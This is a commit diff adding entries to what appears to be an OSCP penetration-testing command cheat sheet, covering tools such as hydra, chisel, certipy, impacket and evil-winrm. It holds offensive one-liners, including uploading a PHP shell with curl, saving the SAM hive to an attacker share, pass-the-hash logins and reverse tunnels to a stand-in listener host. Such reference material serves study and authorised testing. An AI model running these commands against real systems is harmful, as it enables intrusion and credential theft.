Added A-N from my .zsh_history

_commands/autorecon.md

@@ -0,0 +1,22 @@
+---
+command: |
+  autorecon $IP
+variants:
+  - label: single
+    command: |
+      autorecon $IP
+  - label: targets-file
+    command: |
+      autorecon -t targets.txt
+  - label: all-ports
+    command: |
+      autorecon $IP --port-scans top-100-ports --service-scans default
+description: Multi-threaded recon wrapper that runs nmap then per-service enumeration automatically
+os: [Linux]
+category: [oscp, cli]
+service: [SMB, HTTP, DNS]
+phase: [Enumeration]
+references:
+  - https://www.kali.org/tools/autorecon/
+  - https://github.com/Tib3rius/AutoRecon
+---

_commands/certipy-auth.md

@@ -0,0 +1,20 @@
+---
+variants:
+  - label: pfx
+    command: |
+      certipy-ad auth -pfx administrator.pfx -dc-ip $DCIP
+  - label: pfx-user
+    command: |
+      certipy-ad auth -pfx user.pfx -username $USER -domain $DOMAIN -dc-ip $DCIP
+  - label: ldap-shell
+    command: |
+      certipy-ad auth -pfx user.pfx -dc-ip $DCIP -ldap-shell
+description: Authenticate with a certificate via PKINIT to recover a Kerberos TGT and the account NT hash
+os: [Linux]
+category: [oscp, cli]
+service: [ADCS, Kerberos]
+phase: [CredAccess, Exploitation]
+references:
+  - https://www.kali.org/tools/certipy-ad/
+  - https://github.com/ly4k/Certipy
+---

_commands/cewl.md

@@ -0,0 +1,11 @@
+---
+command: |
+  cewl -d 2 -m 5 -w words.txt $URL
+description: Spider a site to depth 2 and build a custom wordlist of words 5 chars or longer
+os: [Linux]
+category: [oscp, cli]
+service: [HTTP]
+phase: [Cracking]
+references:
+  - https://www.kali.org/tools/cewl/
+---

_commands/chisel.md

@@ -0,0 +1,26 @@
+---
+variants:
+  - label: server-reverse
+    command: |
+      chisel server -p $LPORT --reverse
+  - label: client-reverse-socks
+    command: |
+      chisel client $LHOST:$LPORT R:socks
+  - label: client-reverse-fwd
+    command: |
+      chisel client $LHOST:$LPORT R:$LPORT:127.0.0.1:3306
+  - label: server-forward-socks
+    command: |
+      chisel server -p $LPORT --socks5
+  - label: client-forward-socks
+    command: |
+      chisel client $IP:$LPORT socks
+description: Fast TCP/UDP tunnel over HTTP for reverse SOCKS proxies and port forwarding through a foothold
+os: [Linux, Windows]
+category: [oscp, cli]
+service: [HTTP]
+phase: [Pivoting]
+references:
+  - https://gitlab.com/kalilinux/packages/chisel
+  - https://github.com/jpillora/chisel
+---

_commands/curl.md

@@ -0,0 +1,25 @@
+---
+variants:
+  - label: get
+    command: |
+      curl -i $URL
+  - label: headers
+    command: |
+      curl -I $URL
+  - label: post-json
+    command: |
+      curl -X POST -H "Content-Type: application/json" -d '{"user":"admin"}' $URL
+  - label: put-upload
+    command: |
+      curl -X PUT --data-binary @shell.php $URL/shell.php
+  - label: proxy
+    command: |
+      curl -k -x http://127.0.0.1:8080 $URL
+description: Transfer data over HTTP for manual web testing, file upload, and proxying through Burp
+os: [Linux]
+category: [oscp, cli]
+service: [HTTP]
+phase: [Enumeration]
+references:
+  - https://www.kali.org/tools/curl/
+---

_commands/dig.md

@@ -0,0 +1,25 @@
+---
+variants:
+  - label: a-record
+    command: |
+      dig $DOMAIN @$IP
+  - label: any
+    command: |
+      dig ANY $DOMAIN @$IP
+  - label: zone-transfer
+    command: |
+      dig AXFR $DOMAIN @$IP
+  - label: reverse
+    command: |
+      dig -x $IP @$IP
+  - label: ns
+    command: |
+      dig NS $DOMAIN @$IP
+description: Query a DNS server for records and attempt a zone transfer against the target nameserver
+os: [Linux]
+category: [oscp, cli]
+service: [DNS]
+phase: [Enumeration]
+references:
+  - https://www.kali.org/tools/bind9/#dig
+---

_commands/dnsenum.md

@@ -0,0 +1,11 @@
+---
+command: |
+  dnsenum --dnsserver $IP $DOMAIN
+description: Enumerate DNS records, attempt zone transfers, and brute force subdomains for a domain
+os: [Linux]
+category: [oscp, cli]
+service: [DNS]
+phase: [Enumeration]
+references:
+  - https://www.kali.org/tools/dnsenum/
+---

_commands/enum4linux.md

@@ -0,0 +1,16 @@
+---
+variants:
+  - label: all-null
+    command: |
+      enum4linux -a $IP
+  - label: all-creds
+    command: |
+      enum4linux -a -u $USER -p $PASSWORD $IP
+description: Enumerate SMB shares, users, groups, and policy over null or authenticated sessions
+os: [Linux]
+category: [oscp, cli]
+service: [SMB]
+phase: [Enumeration]
+references:
+  - https://www.kali.org/tools/enum4linux/
+---

_commands/evil-winrm.md

@@ -1,23 +1,20 @@
 ---
 variants:
-  - label: creds
+  - label: password
     command: |
       evil-winrm -i $IP -u $USER -p $PASSWORD
-  - label: hash
+  - label: pth
     command: |
       evil-winrm -i $IP -u $USER -H $HASH
-  - label: ticket
+  - label: scripts
     command: |
-      evil-winrm -i $IP -u $USER -k
-  - label: cert
-    command: |
-      evil-winrm -i $IP -c pub.pem -k priv.pem -S -r $DOMAIN
-description: Interactive WinRM shell, by auth method.
+      evil-winrm -i $IP -u $USER -p $PASSWORD -s /scripts -e /executables
+description: Interactive WinRM shell, by auth method, with upload, download, and script loading
 os: [Linux]
 category: [oscp, cli]
-have: [hash, ticket, cert]
 service: [WinRM]
-phase: [Exploitation]
+phase: [Exploitation, LateralMovement]
 references:
+  - https://www.kali.org/tools/evil-winrm/
   - https://github.com/Hackplayers/evil-winrm
 ---

_commands/ffuf.md

@@ -1,11 +1,23 @@
 ---
-command: |
-  ffuf -u http://$IP/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -t 300 -fs 3142
-description: Directory fuzz a web server filtering by response size.
+variants:
+  - label: dir
+    command: |
+      ffuf -u $URL/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
+  - label: vhost
+    command: |
+      ffuf -u $URL -H "Host: FUZZ.$DOMAIN" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -fs 4242
+  - label: post-login
+    command: |
+      ffuf -u $URL/login -X POST -d "username=admin&password=FUZZ" -w /usr/share/wordlists/rockyou.txt -fc 200
+  - label: params
+    command: |
+      ffuf -u "$URL/?FUZZ=value" -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt
+description: Fast web fuzzer for directories, vhosts, login fields, and parameters with response filtering
 os: [Linux]
 category: [oscp, cli]
 service: [HTTP]
 phase: [Enumeration]
 references:
+  - https://www.kali.org/tools/ffuf/
   - https://github.com/ffuf/ffuf
 ---

_commands/fierce.md

@@ -0,0 +1,11 @@
+---
+command: |
+  fierce --domain $DOMAIN --dns-servers $IP
+description: Locate non-contiguous IP space and hostnames for a domain via DNS scanning
+os: [Linux]
+category: [oscp, cli]
+service: [DNS]
+phase: [Enumeration]
+references:
+  - https://www.kali.org/tools/fierce/
+---

_commands/finalrecon.md

@@ -0,0 +1,17 @@
+---
+variants:
+  - label: full
+    command: |
+      finalrecon --full --url $URL
+  - label: headers-whois
+    command: |
+      finalrecon --headers --whois --url $URL
+description: All in one web recon covering headers, SSL, whois, DNS, subdomains, and crawling
+os: [Linux]
+category: [oscp, cli]
+service: [HTTP]
+phase: [Enumeration]
+references:
+  - https://www.kali.org/tools/finalrecon/
+  - https://github.com/thewhiteh4t/FinalRecon
+---

_commands/ftp.md

@@ -0,0 +1,16 @@
+---
+variants:
+  - label: connect
+    command: |
+      ftp $IP
+  - label: anonymous
+    command: |
+      ftp anonymous@$IP
+description: Connect to an FTP service to test anonymous access and browse the file store
+os: [Linux]
+category: [oscp, cli]
+service: [FTP]
+phase: [Enumeration]
+references:
+  - https://www.kali.org/tools/tnftp/
+---

_commands/gobuster.md

@@ -0,0 +1,20 @@
+---
+variants:
+  - label: dir
+    command: |
+      gobuster dir -u $URL -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
+  - label: dns
+    command: |
+      gobuster dns -d $DOMAIN -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
+  - label: vhost
+    command: |
+      gobuster vhost -u $URL -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain
+description: Brute force web content, DNS subdomains, and virtual hosts by mode
+os: [Linux]
+category: [oscp, cli]
+service: [HTTP, DNS]
+phase: [Enumeration]
+references:
+  - https://www.kali.org/tools/gobuster/
+  - https://github.com/OJ/gobuster
+---

_commands/hydra.md

@@ -0,0 +1,22 @@
+---
+variants:
+  - label: ssh
+    command: |
+      hydra -L users.txt -P /usr/share/wordlists/rockyou.txt ssh://$IP
+  - label: ftp
+    command: |
+      hydra -l $USER -P /usr/share/wordlists/rockyou.txt ftp://$IP
+  - label: http-post-form
+    command: |
+      hydra -l $USER -P /usr/share/wordlists/rockyou.txt $IP http-post-form "/login:user=^USER^&pass=^PASS^:F=incorrect"
+  - label: rdp
+    command: |
+      hydra -l $USER -P /usr/share/wordlists/rockyou.txt rdp://$IP
+description: Online password brute forcer, by service, for SSH, FTP, HTTP forms, and RDP
+os: [Linux]
+category: [oscp, cli]
+service: [SSH, FTP, HTTP, RDP]
+phase: [CredAccess]
+references:
+  - https://www.kali.org/tools/hydra/
+---

_commands/impacket-reg.md

@@ -0,0 +1,20 @@
+---
+variants:
+  - label: query
+    command: |
+      impacket-reg $DOMAIN/$USER:$PASSWORD@$IP query -keyName HKLM\SOFTWARE -s
+  - label: save-hive
+    command: |
+      impacket-reg $DOMAIN/$USER:$PASSWORD@$IP save -keyName HKLM\SAM -o \\$LHOST\share\sam.save
+  - label: add-key
+    command: |
+      impacket-reg $DOMAIN/$USER:$PASSWORD@$IP add -keyName HKLM\SOFTWARE\Test -v Flag -vt REG_SZ -vd value
+description: Read and write the remote registry over SMB to query keys or dump SAM, SYSTEM, and SECURITY hives
+os: [Linux]
+category: [oscp, cli]
+service: [RPC, SMB]
+phase: [CredAccess, Enumeration]
+references:
+  - https://www.kali.org/tools/impacket-scripts/
+  - https://github.com/fortra/impacket
+---

_commands/impacket-smbclient.md

@@ -0,0 +1,17 @@
+---
+variants:
+  - label: password
+    command: |
+      impacket-smbclient $DOMAIN/$USER:$PASSWORD@$IP
+  - label: pth
+    command: |
+      impacket-smbclient $DOMAIN/$USER@$IP -hashes :$HASH
+description: Interactive SMB client to list shares and get or put files, with pass the hash support
+os: [Linux]
+category: [oscp, cli]
+service: [SMB]
+phase: [Enumeration, LateralMovement]
+references:
+  - https://www.kali.org/tools/impacket-scripts/
+  - https://github.com/fortra/impacket
+---

_commands/john-extractors.md

@@ -0,0 +1,34 @@
+---
+variants:
+  - label: ssh2john
+    command: |
+      ssh2john id_rsa > hash.txt
+  - label: zip2john
+    command: |
+      zip2john secret.zip > hash.txt
+  - label: rar2john
+    command: |
+      rar2john secret.rar > hash.txt
+  - label: office2john
+    command: |
+      office2john document.docx > hash.txt
+  - label: bitlocker2john
+    command: |
+      bitlocker2john -i drive.img > hash.txt
+  - label: keepass2john
+    command: |
+      keepass2john database.kdbx > hash.txt
+  - label: pdf2john
+    command: |
+      pdf2john document.pdf > hash.txt
+  - label: crack
+    command: |
+      john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
+description: Extract a crackable hash from an encrypted file with the 2john helpers, then crack it with John
+os: [Linux]
+category: [oscp, cli]
+service: [Files]
+phase: [Cracking]
+references:
+  - https://www.kali.org/tools/john/#bitlocker2john
+---